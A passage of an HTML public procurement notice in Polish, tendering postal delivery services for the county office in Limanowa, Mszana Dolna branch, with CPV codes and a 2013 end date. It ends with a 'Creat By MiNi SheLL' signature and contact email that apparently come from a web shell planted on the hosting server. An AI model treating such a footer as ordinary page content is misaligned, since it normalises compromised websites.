2.	świadczenie usługi potwierdzenie odbioru
3.	świadczenie usługi przesyłka pobraniowa w obrocie krajowym polegającej na odebraniu od Nadawcy rejestrowanej przesyłki w obrocie krajowym i doręczenie jej adresatowi  pod warunkiem uiszczenia przez niego odpowiedniej kwoty podanej przez wykonawcę. Pobraną kwotę Wykonawca przekazuje na wskazane przez Zamawiającego konto. 
4.	zwrot do siedziby Nadawcy nie dostarczonych przesyłek niezwłocznie po wyczerpaniu możliwości ich doręczenia. 

Wykonawca będzie doręczał do siedziby Zamawiającego pokwitowane przez adresata potwierdzenie odbioru niezwłocznie po dokonaniu doręczenia przesyłki. 

Usługa winna być realizowana na zasadach określonych w szczególności w:
1.	Ustawie z dnia 12 czerwca 2003r Prawo pocztowe (Dz. U. z 2008r. 
Nr 189, poz. 1159 z późn. zm.)
2.	Rozporządzeniu Ministra Infrastruktury z dnia 9 stycznia 2004r. w sprawie warunków wykonywania powszechnych usług pocztowych (Dz. U. z 2004r, 
Nr 5, poz. 34 z późn. zm.)

Wykonawca zobowiązany jest do posiadania, a w przypadku braku do utworzenia punktu obsługi klienta znajdującego się na terenie miasta Mszana Dolna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Limanowej - Oddział Zamiejscowy w Mszanie Dolnej w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o masie wagowej powyżej 50 gramów oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym o wadze powyżej 50 gramów na potrzeby Starostwa Powiatowego w Limanowej - Oddział Zamiejscowy w Mszanie Dolnej.
Szacunkowe dane dotyczące nadawanych przez Zamawiającego przesyłek w ciągu jednego roku zawiera Formularz cenowy dla zadania częściowego nr 4 stanowiący załącznik do SIWZ. Zamawiający zastrzega, że podane dane mają charakter szacunkowy i zastrzega sobie prawo do zmiany ilości przesyłek danego rodzaju w każdym czasie. 
Usługa stanowiąca przedmiot zamówienia obejmuje w szczególności:
1.	przyjmowanie, przemieszczanie i doręczanie przesyłek pocztowych:
a)	przesyłek listowych nierejestrowanych wraz z usługami komplementarnymi i specjalnymi, 
b)	przesyłek listowych rejestrowanych wraz z usługami komplementarnymi i specjalnymi
c)	paczek pocztowych wraz z usługami komplementarnymi i specjalnymi 
w kategoriach przesyłek priorytetowych i ekonomicznych
2.	świadczenie usługi potwierdzenie odbioru
3.	świadczenie usługi przesyłka pobraniowa w obrocie krajowym polegającej na odebraniu od Nadawcy rejestrowanej przesyłki w obrocie krajowym i doręczenie jej adresatowi pod warunkiem uiszczenia przez niego odpowiedniej kwoty podanej przez Wykonawcę. Pobraną kwotę Wykonawca przekazuje na wskazane przez Zamawiającego konto. 
4.	zwrot do siedziby Nadawcy nie dostarczonych przesyłek niezwłocznie po wyczerpaniu możliwości ich doręczenia. 

Wykonawca będzie doręczał do siedziby Zamawiającego pokwitowane przez adresata potwierdzenie odbioru niezwłocznie po dokonaniu doręczenia przesyłki. 

Usługa winna być realizowana na zasadach określonych w szczególności w:
1.	Ustawie z dnia 12 czerwca 2003r Prawo pocztowe (Dz. U. z 2008r. 
Nr 189, poz. 1159 z późn. zm.)
2.	Rozporządzeniu Ministra Infrastruktury z dnia 9 stycznia 2004r. w sprawie warunków wykonywania powszechnych usług pocztowych (Dz. U. z 2004r, 
Nr 5, poz. 34 z późn. zm.)

Wykonawca zobowiązany jest do posiadania, a w przypadku braku do utworzenia punktu obsługi klienta znajdującego się na terenie miasta Mszana Dolna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com